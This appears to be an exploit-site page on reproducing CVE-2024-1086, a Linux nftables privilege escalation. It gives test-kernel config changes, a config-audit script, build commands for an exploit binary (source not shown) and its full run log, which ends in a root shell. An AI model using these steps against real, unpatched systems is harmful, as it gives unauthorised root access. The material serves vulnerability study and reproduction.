## https://sploitus.com/exploit?id=4562CED5-A8AE-5468-B3D0-19213699DB21
# CVE-2024-1086
For learning purposes.
References:
- https://pwning.tech/nftables/
- https://github.com/Notselwyn/CVE-2024-1086
Kconfig:
```diff
+CONFIG_CONFIGFS_FS=y
+CONFIG_SECURITYFS=y
+CONFIG_NF_TABLES=y
# mnl_cb_run: Operation not supported
+CONFIG_NETFILTER_NETLINK_GLUE_CT=y
+CONFIG_NETLINK_DIAG=y
+CONFIG_NFT_CT=y
+CONFIG_NF_TABLES_IPV4=y
-CONFIG_X86_5LEVEL=y
+CONFIG_PGTABLE_LEVELS=4
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH="/sbin/usermode-helper"
-CONFIG_SLAB_MERGE_DEFAULT=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_SHUFFLE_PAGE_ALLOCATOR=y
-CONFIG_KASAN=y
-CONFIG_KASAN_GENERIC=y
-CONFIG_KASAN_INLINE=y
-CONFIG_KASAN_STACK=y
```
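To check whether a kernel build actually matches the Kconfig diff above before spending time on a reproduction VM, here is an added POSIX sh audit script (not part of the original repository or the referenced exploit). The option list is copied from the diff; the `.config` it checks at the bottom is constructed for the demo, not real build output.

```shell
# Added example, not from the original repo: audit a kernel .config against
# the Kconfig diff above. "+OPTION=value" must appear verbatim; "-OPTION"
# must be absent (i.e. "# OPTION is not set" or missing entirely).
KCONFIG_EXPECT='
+CONFIG_CONFIGFS_FS=y
+CONFIG_SECURITYFS=y
+CONFIG_NF_TABLES=y
+CONFIG_NETFILTER_NETLINK_GLUE_CT=y
+CONFIG_NETLINK_DIAG=y
+CONFIG_NFT_CT=y
+CONFIG_NF_TABLES_IPV4=y
-CONFIG_X86_5LEVEL
+CONFIG_PGTABLE_LEVELS=4
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH="/sbin/usermode-helper"
-CONFIG_SLAB_MERGE_DEFAULT
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_SHUFFLE_PAGE_ALLOCATOR=y
-CONFIG_KASAN
-CONFIG_KASAN_GENERIC
-CONFIG_KASAN_INLINE
-CONFIG_KASAN_STACK
'

# check_kconfig FILE: print one line per mismatch, return 1 if any, else 0.
check_kconfig() {
    cfg=$1 rc=0
    for item in $KCONFIG_EXPECT; do
        name=${item#?}; name=${name%%=*}           # strip +/- and =value
        have=$(grep -E -- "^$name=" "$cfg" || echo "$name unset")
        case $item in
            +*) grep -qxF -- "${item#+}" "$cfg" ||
                    { echo "MISMATCH want ${item#+}, have $have"; rc=1; } ;;
            -*) [ "$have" = "$name unset" ] ||
                    { echo "MISMATCH want $name off, have $have"; rc=1; } ;;
        esac
    done
    return $rc
}

# Constructed sample config: every "+" line from the diff, but KASAN left on.
write_sample_config() {
    printf '%s\n' "$KCONFIG_EXPECT" | sed -n 's/^+//p' > "$1"
    echo 'CONFIG_KASAN=y' >> "$1"
}

tmp=${TMPDIR:-/tmp}/sample.config
write_sample_config "$tmp"
if check_kconfig "$tmp"; then echo "config matches"; else echo "config differs"; fi
```

On a real box, point `check_kconfig` at `/boot/config-$(uname -r)` (or `zcat /proc/config.gz` into a file) instead of the constructed sample.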
Build:
```bash
apt install -y libnftnl-dev libmnl-dev
gcc exp.c -o exp -lnftnl -lmnl
```
Exp:
```
test@syzkaller:~$ uname -a
Linux syzkaller 6.3.0-00001-ge449dbb06b7b #31 SMP PREEMPT_DYNAMIC Mon Dec 16 23:45:41 CST 2024 x86_64 GNU/Linux
test@syzkaller:~$ ./exp
[+] creating user namespace (CLONE_NEWUSER)...
[+] creating network namesapce (CLONE_NEWNET)...
[+] setting up UID namespace...
[+] mapping uid 1000 to namespace uid 0...
[+] deny namespace rights to set user groups...
[+] mapping gid 1000 to namespace gid 0...
[+] configuring localhost in namespace...
[+] disbaling RPF in network namespace...
[+] disabling rpf for interface: 'lo'
[+] disabling rpf for interface: 'sit0'
[+] setting up nftables...
[+] allocating netfilter objects...
[+] sending nftables tables/chains/rules/expr using netlink...
[+] running normal privesc
[+] doing first useless allocs to setup caching and stuff..
[+] allocated VMAs for process:
- pte_area: ?
- _pmd_area: 0x80000000
- modprobe_path: '/sbin/modprobe' @ 0x7ffdfb220ea0
[+] sending intermediate buffer packet...
[+] sending IP packet (32796 bytes)...
[+] waiting for the clam before the storm...
[+] start to reserve udp packets 170
[+] sending double free buffer packet...
[+] sending IP packet (32796 bytes)...
[+] start to free reserved udp packets to mask corrupted packet 170
[+] spraying 16000 pte's...
[+] double-freeing skb...
[+] sending intermediate buffer packet...
[+] sending IP packet (20 bytes)...
[ 78.851572] ------------[ cut here ]------------
[ 78.851936] WARNING: CPU: 0 PID: 218 at mm/slab_common.c:935 free_large_kmalloc+0x5e/0x90
[ 78.852409] Modules linked in:
[ 78.852692] CPU: 0 PID: 218 Comm: exp Not tainted 6.3.0-00001-ge449dbb06b7b #31
[ 78.852867] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 78.852867] RIP: 0010:free_large_kmalloc+0x5e/0x90
[ 78.853565] Code: 45 00 be 06 00 00 00 48 c1 e8 3a 48 8b 3c c5 e0 cf c9 82 e8 64 5e ff ff 44 89 e6 48 89 ef 48 83 c4 08 5d 41 5c e9 12 44 03 00 <0f> 0b 45 31 e4 80 3d a7 0c a7 01 00 48 c78
[ 78.854277] RSP: 0018:ffff88813bc05d20 EFLAGS: 00000246
[ 78.854470] RAX: 0200000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[ 78.854641] RDX: 0000000000000000 RSI: ffff88810ab10000 RDI: ffffea00042ac400
[ 78.854806] RBP: ffffea00042ac400 R08: ffff88810aab7450 R09: 0000000000000001
[ 78.855119] R10: ffff88810018d490 R11: ffff88813bc2b270 R12: 0000000000000002
[ 78.855291] R13: ffff88810aabd900 R14: ffff88810aab7450 R15: 0000000000000014
[ 78.855509] FS: 00007f09941f8740(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 78.855731] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 78.856008] CR2: 00000087cfe00000 CR3: 0000000102fd0000 CR4: 00000000000006f0
[ 78.856305] Call Trace:
[ 78.857067] <IRQ>
[ 78.857449] skb_release_data+0xea/0x1c0
[ 78.857695] kfree_skb_reason+0x4b/0x110
[ 78.857801] inet_frag_rbtree_purge+0x4f/0x80
[ 78.858405] inet_frag_destroy+0x49/0x80
[ 78.858535] ip_defrag+0x4ce/0x840
[ 78.858644] ip_local_deliver+0x50/0x120
[ 78.858928] ? ip_rcv+0xd7/0x170
[ 78.859032] __netif_receive_skb_one_core+0x86/0xa0
[ 78.859181] process_backlog+0x98/0x140
[ 78.859280] __napi_poll+0x27/0x1b0
[ 78.859390] net_rx_action+0x28a/0x2e0
[ 78.859483] __do_softirq+0xc0/0x290
[ 78.859625] do_softirq+0x62/0x90
[ 78.859932] </IRQ>
[ 78.860011] <TASK>
[ 78.860064] __local_bh_enable_ip+0x59/0x70
[ 78.860197] ip_finish_output2+0x182/0x500
[ 78.860429] ? __pfx_ip_finish_output+0x10/0x10
[ 78.860578] raw_sendmsg+0xccb/0xce0
[ 78.860696] ? common_interrupt+0x13/0xa0
[ 78.860812] ? __pfx_dst_output+0x10/0x10
[ 78.860831] ? sock_sendmsg+0x8a/0xa0
[ 78.860831] ? __pfx_raw_sendmsg+0x10/0x10
[ 78.860831] sock_sendmsg+0x8a/0xa0
[ 78.860831] ? move_addr_to_kernel.part.0+0x16/0x60
[ 78.860831] __sys_sendto+0xfb/0x170
[ 78.860831] ? vfs_write+0x1a8/0x3a0
[ 78.860831] __x64_sys_sendto+0x1f/0x30
[ 78.861832] do_syscall_64+0x3f/0x90
[ 78.861944] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 78.862257] RIP: 0033:0x7f09942f8046
[ 78.862593] Code: 0e 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 11 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 72 c3 90 55 48 83 ec9
[ 78.863251] RSP: 002b:00007ffdfb220d88 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
[ 78.863490] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f09942f8046
[ 78.863637] RDX: 0000000000000014 RSI: 0000557f4b4e6300 RDI: 0000000000000005
[ 78.863786] RBP: 00007ffdfb220db0 R08: 00007ffdfb220de0 R09: 0000000000000010
[ 78.864158] R10: 0000000000000000 R11: 0000000000000246 R12: 0000557f4b4e05b0
[ 78.864496] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[ 78.864863] </TASK>
[ 78.865130] ---[ end trace 0000000000000000 ]---
[ 78.865559] object pointer: 0x00000000f3fec870
[+] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
- PTE area index: 68
- PTE area (write target address/page: 8000000111fcc067 (new)
[+] flush tlb thread gonna sleep
- PMD area (read target value/page): f000ff53f000ff53 (new)
[ 78.979646] memfd_create() without MFD_EXEC nor MFD_NOEXEC_SEAL, pid=218 'exp'
[+] flush tlb thread gonna sleep
[+] found possible physical kernel base: 0000000001000000
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] verified modprobe_path/usermodehelper_path: 000000000268611c ('/sbin/usermode-helper')...
[+] overwriting path with PIDs in range 0->4194304...
[ 80.401031] process 'exp' launched '/dev/fd/13' with NULL argv: empty string added
[ 80.711688] audit: type=1400 audit(1734370080.435:6): avc: denied { write } for pid=451 comm="11" name="fd" dev="proc" ino=885 scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:1
[ 80.712534] audit: type=1400 audit(1734370080.435:7): avc: denied { add_name } for pid=451 comm="11" name="12" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_1
[ 80.712810] audit: type=1400 audit(1734370080.436:8): avc: denied { create } for pid=451 comm="11" name="12" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:object_r:kernel_t:1
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
# exit
[+] successfully breached the mainframe as read-PID 218
```